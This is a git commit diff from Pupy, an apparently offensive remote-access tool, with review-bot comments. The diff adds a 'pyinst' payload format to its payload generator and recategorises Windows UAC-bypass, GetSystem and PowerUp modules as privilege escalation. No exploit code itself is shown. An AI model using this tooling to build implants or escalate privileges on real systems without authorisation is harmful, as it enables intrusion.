Merge remote-tracking branch 'upstream/master'

Alessandro ZANNI 2016-07-28 17:51:15 +02:00
commit ef36a137ea
7 changed files with 96 additions and 11 deletions

75
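--- a/pupy/conf/imports_done.py
+++ b/pupy/conf/imports_done.py
@@ -0,0 +1,75 @@
+from collections import OrderedDict
+from Crypto.Cipher import AES
+from Crypto.Hash import HMAC
+from Crypto.Hash import SHA256
+from Crypto.Hash import SHA256, HMAC
+from Crypto import Random
+from Crypto.Protocol.KDF import PBKDF2
+from Crypto.Util import Counter
+from cStringIO import StringIO
+from itertools import izip, starmap
+from operator import xor
+from StringIO import StringIO
+from struct import Struct
+import argparse
+import base64
+import binascii
+import bz2
+import code
+import collections
+import configparser
+import copy
+import cPickle
+import Crypto.Cipher
+import Crypto.Cipher.AES
+import Crypto.Hash.HMAC
+import Crypto.Hash.SHA256
+import Crypto.Util.Counter
+import datetime
+import errno, stat
+import fractions
+import __future__
+import getpass
+import glob
+import hashlib
+import hmac
+import imp
+import importlib
+import inspect
+import json
+import logging
+import math
+import multiprocessing
+import new
+import os
+import pkgutil
+import platform
+import Queue
+import random
+import re
+import rsa
+import shlex
+import shutil
+import site
+import socket
+import SocketServer
+import ssl
+import string
+import StringIO
+import struct
+import subprocess
+import sys
+import tempfile
+import threading
+import time
+import traceback
+import urllib
+import urllib2
+import uuid
+import yaml
+import zlib
+if os.name == 'nt':
+import ctypes
+import ctypes.wintypes
+if os.name == 'posix':
+import pty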
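Review bot: Several imports in this new file are duplicated or shadow each other: `from Crypto.Hash import SHA256` and `from Crypto.Hash import HMAC` are repeated by `from Crypto.Hash import SHA256, HMAC`, `Crypto.Cipher.AES`/`Crypto.Hash.*`/`Crypto.Util.Counter` are imported twice in two forms, and `from cStringIO import StringIO` is immediately overridden by `from StringIO import StringIO`, so the first binding is dead. Since getLinuxImportedModules reads this file verbatim and pupygen pastes it at the top of a generated `pyinst` file, every line here executes at import time of that generated script, so the list deserves deduplication and a header comment stating that contract, e.g. `# Read verbatim by getLinuxImportedModules() and prepended to 'pyinst' payload files; keep this to plain import statements only.` The `import ctypes`, `import ctypes.wintypes` and `import pty` lines under the two `if os.name` guards appear unindented in the rendering; if that is how the file is stored it is a SyntaxError, so it is worth confirming against the raw file.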


@ -8,7 +8,7 @@ __class_name__="BypassUAC"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
@config(compat="windows", category="exploit")
@config(compat="windows", category="privesc")
class BypassUAC(PupyModule):
""" try to bypass UAC with Invoke-BypassUAC.ps1, from Empire """
dependencies=["psutil", "pupwinutils.processes"]


@ -4,7 +4,7 @@ from pupylib.utils.rpyc_utils import redirected_stdo
from modules.lib.windows.migrate import migrate
__class_name__="GetSystem"
@config(compat="windows", category="exploit")
@config(compat="windows", category="privesc")
class GetSystem(PupyModule):
""" try to get NT AUTHORITY SYSTEM privileges """
dependencies=["psutil", "pupwinutils.security"]


@ -6,7 +6,7 @@ from modules.lib.windows.powershell_upload import execute_powershell_script
__class_name__="PowerUp"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@config(compat="windows", category="admin")
@config(compat="windows", category="privesc")
class PowerUp(PupyModule):
""" trying common Windows privilege escalation methods"""
@ -23,4 +23,4 @@ class PowerUp(PupyModule):
# parse output depending on the PowerUp output
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
self.success("%s" % output)
self.success("%s" % output)


@ -7,7 +7,7 @@ import logging, argparse, sys, os.path, re, shlex, random, string, zipfile, tarf
from pupylib.utils.network import get_local_ip
from pupylib.utils.term import colorize
from pupylib.payloads.python_packer import gen_package_pickled_dic
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload, getLinuxImportedModules
from pupylib.utils.obfuscate import compress_encode_obfs
from network.conf import transports, launchers
from network.lib.base_launcher import LauncherError
@ -236,6 +236,7 @@ class ListOptions(argparse.Action):
print "\t- exe_86, exe_x64 : generate PE exe for windows"
print "\t- dll_86, dll_x64 : generate reflective dll for windows"
print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
print "\t- pyinst : generate a python file compatible with pyinstaller"
print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line."
print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell."
@ -254,7 +255,7 @@ class ListOptions(argparse.Action):
print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
exit()
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'py_oneliner', 'ps1_oneliner']
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1_oneliner']
if __name__=="__main__":
if os.path.dirname(__file__):
os.chdir(os.path.dirname(__file__))
@ -331,12 +332,15 @@ if __name__=="__main__":
if not outpath:
outpath="pupy.apk"
get_edit_apk(os.path.join("payload_templates","pupy.apk"), outpath, conf)
elif args.format=="py":
elif args.format=="py" or args.format=="pyinst":
linux_modules = ""
if not outpath:
outpath="payload.py"
if args.format=="pyinst" :
linux_modules = getLinuxImportedModules()
packed_payload=pack_py_payload(get_raw_conf(conf))
with open(outpath, 'wb') as w:
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+packed_payload)
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+linux_modules+"\n"+packed_payload)
elif args.format=="py_oneliner":
packed_payload=pack_py_payload(get_raw_conf(conf))
i=conf["launcher_args"].index("--host")+1
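Review bot: The new `elif args.format=="py" or args.format=="pyinst":` branch would read better as `elif args.format in ("py", "pyinst"):`, and the `linux_modules` name is misleading because the text it receives (conf/imports_done.py, via getLinuxImportedModules) carries both `os.name == 'nt'` and `os.name == 'posix'` guarded blocks. The `getLinuxImportedModules()` call has no comment saying why an import list is prepended; the ListOptions help text in the earlier hunk says `pyinst` targets pyinstaller, so a line such as `# pyinst: prepend a plain import list so PyInstaller's static import scan bundles these modules` would capture that (confirm this is the intended mechanism). Note that for the plain `py` format the write now always inserts an extra `"\n"` after the coding line, which is harmless but changes the output by one blank line. The enclosing `if __name__=="__main__":` block starts and ends outside this hunk.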


@ -4,5 +4,5 @@
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
#authorized categories
categories=["general", "manage", "admin", "exploit", "network", "gather", "troll", "misc"]
categories=["general", "manage", "admin", "exploit", "privesc", "network", "gather", "troll", "misc"]


@ -13,6 +13,14 @@ from pupylib.payloads.python_packer import get_load_module_code, gen_package_pic
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
def getLinuxImportedModules():
'''
'''
lines = ""
with open(os.path.join(ROOT,"conf","imports_done.py")) as f:
lines=f.read()
return lines
def pack_py_payload(conf):
print colorize("[+] ","green")+"generating payload ..."
fullpayload=[]
@ -74,5 +82,3 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip="<your_ip>"):
print 'KeyboardInterrupt received, shutting down the web server'
server.socket.close()
exit()
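Review bot: `getLinuxImportedModules` ships with an empty docstring (`'''` / `'''`), and the `lines = ""` initialisation is dead because the `with` block always assigns it before the return. A docstring such as `'''Return the raw text of conf/imports_done.py; pupygen prepends it to "pyinst" output (presumably so PyInstaller's import scan bundles those modules).'''` would document the contract, and since the file it reads contains both nt- and posix-guarded imports the "Linux" in the name should be reconciled with that in the same docstring. The open() uses the default mode and any missing-file IOError propagates raw, which is acceptable for a generator tool but worth stating. The second hunk at the end of serve_payload is only trailing-whitespace removal.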